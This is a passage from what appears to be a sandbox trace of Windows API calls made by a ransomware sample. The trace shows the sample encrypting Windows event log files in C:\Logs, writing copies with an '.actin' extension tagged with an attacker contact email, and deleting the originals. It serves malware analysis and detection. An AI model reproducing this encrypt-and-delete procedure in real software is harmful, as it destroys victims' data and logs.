"c:\\logs\\microsoft-windows-ntfs%4whc.evtx")) returned 0x20 [0064.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.619] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.619] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.619] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.619] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0064.619] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71e00) returned 1 [0064.619] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.619] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.621] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.621] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.622] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71ec0) returned 1 [0064.622] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.622] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70, dwBufLen=0x70 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70) returned 1 [0064.622] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0064.623] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x122, lpOverlapped=0x0) returned 1 [0064.623] CryptDestroyKey (hKey=0xf71e00) returned 1 [0064.623] CloseHandle (hObject=0x338) returned 1 [0064.623] CloseHandle (hObject=0x328) returned 1 [0064.624] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx")) returned 1 [0064.626] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.626] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.169] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.169] CloseHandle (hObject=0x30c) returned 1 [0065.169] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx")) returned 0x20 [0065.169] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.173] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0065.173] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.174] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.174] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0065.174] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b80) returned 1 [0065.174] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.174] ReadFile (in: hFile=0x328, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.187] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.187] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.189] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71cc0) returned 1 [0065.189] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.189] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc0, dwBufLen=0xc0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc0) returned 1 [0065.189] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0065.189] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x172, lpOverlapped=0x0) returned 1 [0065.189] CryptDestroyKey (hKey=0xf71b80) returned 1 [0065.189] CloseHandle (hObject=0x328) returned 1 [0065.189] CloseHandle (hObject=0x338) returned 1 [0065.191] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx")) returned 1 [0065.193] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.193] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0065.193] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.193] CloseHandle (hObject=0x338) returned 1 [0065.193] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx")) returned 0x20 [0065.193] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.194] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0065.194] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.194] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.194] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0065.194] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72180) returned 1 [0065.194] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.194] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.204] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.204] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.206] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a00) returned 1 [0065.206] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.206] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xb0, dwBufLen=0xb0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xb0) returned 1 [0065.207] CryptDestroyKey (hKey=0xf71a00) returned 1 [0065.207] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x162, lpOverlapped=0x0) returned 1 [0065.207] CryptDestroyKey (hKey=0xf72180) returned 1 [0065.207] CloseHandle (hObject=0x338) returned 1 [0065.207] CloseHandle (hObject=0x328) returned 1 [0065.209] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx")) returned 1 [0065.211] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.211] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0065.212] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.212] CloseHandle (hObject=0x338) returned 1 [0065.212] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx")) returned 0x20 [0065.212] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.216] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.216] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.216] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.216] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.216] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ec0) returned 1 [0065.216] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.216] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.232] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.232] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.234] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b00) returned 1 [0065.234] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.234] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0065.234] CryptDestroyKey (hKey=0xf71b00) returned 1 [0065.234] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0065.234] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0065.234] CloseHandle (hObject=0x2e4) returned 1 [0065.234] CloseHandle (hObject=0x30c) returned 1 [0065.237] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx")) returned 1 [0065.238] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.238] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.238] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.238] CloseHandle (hObject=0x30c) returned 1 [0065.239] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx")) returned 0x20 [0065.239] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.239] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.239] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.239] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.239] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.239] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ec0) returned 1 [0065.239] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.239] ReadFile (in: hFile=0x30c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.241] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.241] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.243] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72100) returned 1 [0065.243] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.243] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0065.243] CryptDestroyKey (hKey=0xf72100) returned 1 [0065.243] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0065.243] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0065.243] CloseHandle (hObject=0x30c) returned 1 [0065.243] CloseHandle (hObject=0x2e4) returned 1 [0065.245] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx")) returned 1 [0065.247] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.247] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.247] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.247] CloseHandle (hObject=0x2e4) returned 1 [0065.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx")) returned 0x20 [0065.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.247] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.247] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.247] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.247] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.247] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72000) returned 1 [0065.248] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.248] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.611] CryptEncrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.611] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0065.613] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71bc0) returned 1 [0065.613] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.613] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0065.613] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0065.613] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0065.613] CryptDestroyKey (hKey=0xf72000) returned 1 [0065.613] CloseHandle (hObject=0x2e4) returned 1 [0065.613] CloseHandle (hObject=0x30c) returned 1 [0065.615] DeleteFileW 